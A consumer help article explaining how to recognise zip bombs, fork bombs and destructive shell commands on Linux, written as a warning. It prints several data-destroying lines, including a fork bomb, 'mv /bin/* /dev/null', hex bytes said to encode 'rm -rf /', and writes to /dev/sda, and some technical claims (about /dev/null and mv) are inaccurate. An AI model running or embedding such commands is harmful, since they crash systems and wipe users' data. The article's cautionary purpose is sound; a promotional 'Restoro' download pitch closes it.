How to Prevent Virus-like Behavior Under Linux

If you’re experiencing unpredictable behavior on a Linux machine, then you’re more than likely suffering from a configuration or hardware issue. Strange happenings are usually related to these two conditions. Some graphics adapters don’t work without installing proprietary software, and look strange otherwise. You may have also lost data as the result of a file system mismatch or something else unusual like this. Nevertheless, it could be tempting to blame such problems on a virus.

Virus is a term that many people incorrectly use to refer to all kinds of different malware. True viral infections are exceptionally rare on Linux. Keep in mind that GNU/Linux isn’t the most popular platform for consumer machines. Relatively few threats target home users of Linux as a result. Servers are far more attractive, though there are some threats for the Google Android distributions used on smartphones and tablets. Always make sure to rule out other possibilities before panicking. Linux vulnerabilities are often more esoteric than virus infections. They’re often more like exploits. Keep these hints in mind and you won’t have to deal with any serious issues. Please remember that the commands discussed here are extremely dangerous, and shouldn’t be used. We’re merely telling you what to look out for. While we took a few screenshots in the process, we actually used a virtual machine for that purpose and didn’t cause damage to a real file structure.

Method 1: Preventing Zip Bombs

Zip bombs are particularly problematic because they cause issues for all problems equally. These don’t exploit the operating system, but rather the way file archivers work. A zip bomb exploit made to harm MS-DOS computers in the 1980s could still cause exactly the same problem for an Android smartphone 10 years from now.

Take the infamous 42.zip compressed directory for example. While it’s classically named 42.zip since it takes up 42 kilobytes of space, a prankster could call it whatever they’d like. The archive holds five different layers of nested archives organized in sets of 16. Each of these contains a bottom layer that holds approximately 3.99 binary gigabytes of null characters. This is the same junk data that comes out of the /dev/null device file in Linux as well as the NUL device in MS-DOS and Microsoft Windows. Since all the characters are null, they can be compressed to an extreme and thus make a very small file in the process.

All of this null data together takes up approximately 3.99 binary petabytes of space when decompressed. This is enough to file up even a RAID file structure. Never decompress archives you’re unsure about to prevent this problem.

If this were to ever happen to you, though, reboot your system from a Linux live CD, microSDHC card or USB stick and delete the excess null files, then reboot again from your main file system. The data itself isn’t harmful usually. This exploit just takes advantage of the fact that most file structures and RAM configurations can’t hold that much data at once.

Method 2: Command Trick Exploits

Never run a Bash or tcsh command if you’re not sure exactly of what it does. Some people try to trick new Linux users into running something that’s going to harm their system. Even experienced users can get slipped up by very crafty pranksters who author specific types of dangerous commands. The most common of these involve fork bombs. This type of exploit defines a function, which then calls itself. Each newly spawned child process calls itself until the entire system crashes and has to be restarted.

If someone asks you to run something absurd like :(){:|:&};:, then they’re insulting you and attempting to get you to crash your machine. More and more Linux distributions now have protections against this. Some tell you that you’re defining a process in an invalid manner.

2016-11-25_021652

There’s at least one test version of FreeBSD that actively slings an insult at any user who tries to do this, but doesn’t allow them to actually harm their system. Don’t ever try it for the sake of trying it though.

2016-11-25_021740

Method 3: Examining Unusual Scripts

Anytime you receive a Python, Perl, Bash, Dash, tcsh or any other type of script, examine it before you try it. Harmful commands might be hidden inside of it. Take a look for anything that looks like a bunch of hexadecimal code. For instance:

“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″

“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″

These two lines are taken from a script that encoded the exceptionally destructive rm -rf / command into hex code. If you didn’t know what you were doing, then you could have easily zapped your entire installation and potentially a UEFI boot system along with it.

Look for commands that appear superficially innocuous that are potentially harmful, though. You may be familiar with how you can use the > symbol to redirect output from one command into another. If you see anything like that redirecting into something called /dev/sda or /dev/sdb, then that’s an attempt to replace data in a volume with garbage. You don’t want to do that.

Another one you’ll very often see is a command that’s something like this:

mv /bin/* /dev/null

The /dev/null device file is nothing more than a bit bucket. It’s a point of no return for data. This command moves the contents of the /bin directory to /dev/null, which removes everything inside of it. Since this requires root access to do, some crafty pranksters will instead write something like mv ~/* /dev/null, since this does the same to a user’s directory, but without needing any special access. Certain distributions will now return error messages if you attempt to do this:

2016-11-25_021843

Pay close attention to anything that uses the dd or mkfs.ext3 or mkfs.vfat commands. These will format a drive, and look relatively normal.

Once again, please keep in mind that you should never run any of these commands on a live file system. We’re only telling you what to look out for, and we don’t want anyone to toast his or her data. Be cautious and make sure you know what you’re doing before using an outside file.

Kevin Arrows
Kevin is a dynamic and self-motivated information technology professional, with a Thorough knowledge of all facets pertaining to network infrastructure design, implementation and administration. Superior record of delivering simultaneous large-scale mission critical projects on time and under budget.

Expert Tip

How to Prevent Virus-like Behavior Under Linux

If the issue is with your Computer or a Laptop you should try using Restoro which can scan the repositories and replace corrupt and missing files. This works in most cases, where the issue is originated due to a system corruption. You can download Restoro by clicking the Download button below.

Download Now

I'm not interested